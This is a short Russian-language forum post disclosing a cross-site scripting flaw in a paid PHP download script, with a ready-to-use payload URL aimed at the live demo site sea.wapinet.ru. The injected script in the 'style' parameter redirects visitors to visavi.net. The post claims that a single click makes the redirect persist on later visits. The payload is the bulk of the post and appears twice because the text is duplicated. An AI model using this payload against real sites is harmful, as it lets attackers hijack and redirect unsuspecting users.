Уязвимость SEA Downoloads
382
Собственно платный движек:
http://wapinet.ru/buy_php_scripts
Пример:
http://sea.wapinet.ru/
Уязвимость:
http://sea.wapinet.ru/?url=somebody.com&style=sea.wapinet.ru/style/style.css"><script>location.href="//visavi.net";</script>
Если хотя бы раз подключить юзера к этому линку,то при переходе на
http://sea.wapinet.ru
его будет бросать на http://visavi.net
http://wapinet.ru/buy_php_scripts
Пример:
http://sea.wapinet.ru/
Уязвимость:
http://sea.wapinet.ru/?url=somebody.com&style=sea.wapinet.ru/style/style.css"><script>location.href="//visavi.net";</script>
Если хотя бы раз подключить юзера к этому линку,то при переходе на
http://sea.wapinet.ru
его будет бросать на http://visavi.net
Для выполнения действия необходимо авторизоваться!